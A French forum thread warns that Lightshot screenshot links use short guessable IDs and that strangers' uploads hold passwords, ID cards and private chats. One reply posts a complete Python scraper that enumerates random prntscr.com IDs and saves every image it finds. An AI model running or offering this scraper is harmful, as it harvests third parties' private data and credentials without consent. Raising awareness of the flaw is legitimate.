N'uploadez rien de délicat sur Lighshot !

jdev

Membre
Inscription
8 Juin 2018
Messages
28
Réactions
18
Points
71
Bonjour à tous,

Je vais essayer d'être au plus clair et concis.

Je pense que vous connaissez pratiquement tous Lighshot, application pour créer des captures d'écrans et les partager. Elle permet en effet d'uploader automatiquement sur ses serveurs des captures écran pour les partager en ligne via leur service .

Jusque là, tout va bien me direz-vous, mais si vous êtes attentif, les screenshots se retrouvent sur une URL publique comme : ou encore Chaque URL est composé d'une chaîne alphanumérique séquencielle de 5-6 caractères, et il est donc très simple d'aller observer les screens des autres...


Merci à Naïm Gallouj d'avoir mis en lumière ce soucis.

J'ai donc codé un petit script me permettant d'enregistrer dans un dossier tout une séquence de screens allant par exemple de aaa000...baa000 à zzz999 (ce qui fait un bon paquets de photos, j'ai stopper le programme avant la fin...).
Et c'est comme ça que j'ai pu apercevoir beaucoup de merd de screens sans intérêt comme des
captures d'écrans de jeux-vidéos ou bien des sites russes.. mais j'y ai aussi trouvé un bon nombre d'IP, de cartes d'identités/crédits, d'adresses mail gentiment suivies de mots de passe, de conversations personnelles (Facebook, Skype, Steam...), d'images de filles dénudées.. et j'en passe.


Tout ça pour prévenir de faire attention à ce que vous uploadez sur ce site.

Merci de votre attention ?
 

Ashuz

Super modérateur
Inscription
10 Janvier 2015
Messages
17 936
Réactions
8 466
Points
30 647
j'étais au courant de cette technique perso, en même temps en y réfléchissant ce n'est pas tellement un secret. Cependant tout le monde n'y pense pas forcément donc bonne initiative de prévenir :)
 

Jaolish

Membre
Inscription
26 Juillet 2016
Messages
335
Réactions
34
Points
1 516
Bonne astuce, les images se suppriment au bout d'un moment il me semble non ? je ne sais pas combien de jours par contre.
 

Djinh

:)
Premium
Inscription
24 Juin 2012
Messages
3 931
Réactions
1 635
Points
11 596
Merci de prévenir, je me disais aussi que les URL Lightshot pouvaient facilement être récupérer et nos données stockés étant donné que ce n'est que 6 caractères qui change.
 

SziCx

Premium
Inscription
19 Avril 2012
Messages
2 362
Réactions
949
Points
17 443
A savoir qu'il y a beaucoup d'autres sites avec lesquels la technique fonctionne aussi ! Ne jamais mettre n'importe quoi sur le web en règle générale.
 

GARO-NORD

Ancien staff
Inscription
24 Août 2012
Messages
3 615
Réactions
273
Points
16 756
Code:
#!/usr/bin/env python

import httplib2, sys, os, random, string

ENDLINE = '\033[0m'
BOLD = '\033[1m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
GREEN = '\033[92m'
RED = '\033[91m'
GREYBACK = '\033[40m'

dirname = 'Lightshotr'

pngCount = 0
foundss = 0

def generateId(size=6):
    return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(size))

def SavePic(content, ID, ext):
    f = open(dirname + '/' +str(ID) + ext,'wb')
    f.write(content)
    f.close

def PrintStatus(pngCount, link, COLOR):
    sys.stdout.write(BLUE + BOLD + '[+] ' + ENDLINE + str(pngCount) + ' Screenshots Found - ' + COLOR + BOLD + link + ENDLINE + '\r')
    sys.stdout.flush()

def Aborting():
    print '\n\n' + GREEN + BOLD + '[+]' + ENDLINE + ' All found Screenshots were saved to: ' + BOLD + os.getcwd() + '/' + dirname + ENDLINE + ' . Enjoy ;)\n'
    sys.exit()

print YELLOW + BOLD + '''

 ''' + ENDLINE + GREYBACK + YELLOW + BOLD + 'Author:' + ENDLINE + ' @xD4rker\n'

if not os.path.exists(dirname):
    os.makedirs(dirname)

while 1:

    try:

        COLOR = RED
        ID = generateId()
        link = 'http://prntscr.com/' + ID + '/direct'
        h = httplib2.Http(timeout=100)
        resp = h.request(link)

        if 'content-location' in resp[0]:
            pngUrl = resp[0]['content-location']
            ext = '.' + pngUrl[-3:]

            if (pngUrl != 'http://i.imgur.com/8tdUI8N.png') & (ext == '.png' or ext == '.jpg'):
                pngCount += 1
                SavePic(resp[1], ID, ext)
                COLOR = GREEN
            
        PrintStatus(pngCount, link, COLOR)

    except KeyboardInterrupt:
Aborting()
 

Karuma

a soul in a temporary vessel
Premium
Inscription
31 Mai 2012
Messages
5 431
Réactions
948
Points
14 975
Yo foreal merci je savais pas :') Le nombre de truc louche que j'ai send à mes amis ahah
 

InitSys

Le chat noir
Premium
Inscription
31 Mai 2012
Messages
854
Réactions
266
Points
20 823
Je veux bien le script si jamais !

Bonjour à tous,

Je vais essayer d'être au plus clair et concis.

Je pense que vous connaissez pratiquement tous Lighshot, application pour créer des captures d'écrans et les partager. Elle permet en effet d'uploader automatiquement sur ses serveurs des captures écran pour les partager en ligne via leur service .

Jusque là, tout va bien me direz-vous, mais si vous êtes attentif, les screenshots se retrouvent sur une URL publique comme : ou encore Chaque URL est composé d'une chaîne alphanumérique séquencielle de 5-6 caractères, et il est donc très simple d'aller observer les screens des autres...



J'ai donc codé un petit script me permettant d'enregistrer dans un dossier tout une séquence de screens allant par exemple de aaa000...baa000 à zzz999 (ce qui fait un bon paquets de photos, j'ai stopper le programme avant la fin...).
Et c'est comme ça que j'ai pu apercevoir beaucoup de merd de screens sans intérêt comme des
captures d'écrans de jeux-vidéos ou bien des sites russes.. mais j'y ai aussi trouvé un bon nombre d'IP, de cartes d'identités/crédits, d'adresses mail gentiment suivies de mots de passe, de conversations personnelles (Facebook, Skype, Steam...), d'images de filles dénudées.. et j'en passe.


Tout ça pour prévenir de faire attention à ce que vous uploadez sur ce site.

Merci de votre attention ?

Et au passage, merci de citer la source qui est Korben
 

Florian.

Premium
Inscription
8 Août 2012
Messages
4 251
Réactions
1 220
Points
14 353
xD plutot pas mal
1538069963651.png
 
Haut